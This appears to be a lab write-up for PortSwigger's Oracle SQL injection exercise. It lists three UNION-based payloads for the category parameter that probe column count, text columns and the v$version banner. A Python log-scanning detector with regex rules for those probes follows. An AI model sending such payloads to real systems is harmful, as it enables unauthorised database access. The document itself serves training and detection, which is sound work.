Lab: SQL injection attack, querying the database type and version on Oracle

tags: Portswigger Web Security Academy Web
  • Description: This lab contains a SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
  • Our Goal: To solve the lab, display the database version string.

Exp - SQLi Cheat Sheet - Examining the database in SQL injection attacks

According to the cheat sheet above, we can use a query that reads the database's version string. Before starting the recon, note that the lab description tells you the database is Oracle. On Oracle every SELECT must contain a FROM clause, so each injected query has to name a table, e.g. SELECT 'abc' FROM dual.

  1. Determine the number of columns returned by the original query

    Payload: ?category=Gifts' union select NULL,NULL from v$version--

  2. Determine which columns contain text data

    Payload: ?category=Gifts' union select 'a','b' from v$version--

    Both columns accept text data.

  3. Attack: retrieve the version string

    Payload: ?category=Gifts' UNION SELECT BANNER,'abc' FROM v$version--
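From the defensive side, the three probe stages above leave a recognisable trail in web-server access logs. The following detector is an added example, not part of the lab or PortSwigger's material; the log lines, the `/filter` path and the rule names are constructed for illustration.

```python
"""Flag the UNION-based Oracle version probes shown above in access-log lines."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample log: one benign request, then the three probe stages.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /filter?category=Gifts HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /filter?category=Gifts'%20union%20select%20NULL,NULL%20from%20v$version-- HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /filter?category=Gifts'%20union%20select%20'a','b'%20from%20v$version-- HTTP/1.1" 200 5130
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /filter?category=Gifts'%20UNION%20SELECT%20BANNER,'abc'%20FROM%20v$version-- HTTP/1.1" 200 5400
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Rules run against the decoded, whitespace-collapsed, lower-cased parameter value.
RULES = [
    ("quote-terminated-union-select", re.compile(r"'\s*union\s+select\b")),
    ("union-column-count-probe", re.compile(r"union\s+select\s+null(\s*,\s*null)*")),
    ("union-string-type-probe", re.compile(r"union\s+select\s+'[^']*'(\s*,\s*'[^']*')+")),
    ("oracle-version-read", re.compile(r"\bv\$version\b|\bfrom\s+dual\b")),
]


def normalise(value: str) -> str:
    """Decode twice to defeat double percent-encoding, then collapse whitespace."""
    decoded = unquote_plus(unquote_plus(value))
    return re.sub(r"\s+", " ", decoded).lower()


def classify_request(path: str) -> list[str]:
    """Return the names of every rule matched by any query parameter in the path."""
    hits = []
    for _name, raw in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        value = normalise(raw)
        for rule_name, pattern in RULES:
            if pattern.search(value) and rule_name not in hits:
                hits.append(rule_name)
    return hits


def scan_log(log_text: str) -> list[tuple[str, list[str]]]:
    """Return (request path, matched rules) for every suspicious line in the log."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if match and (hits := classify_request(match.group(1))):
            findings.append((match.group(1), hits))
    return findings


if __name__ == "__main__":
    for path, hits in scan_log(SAMPLE_LOG):
        print(path, "->", ", ".join(hits))
```

The rules deliberately key on the Oracle-specific tells (`v$version`, `FROM dual`) as well as the generic quote-terminated UNION SELECT, so a column-count probe is caught before any data is actually extracted.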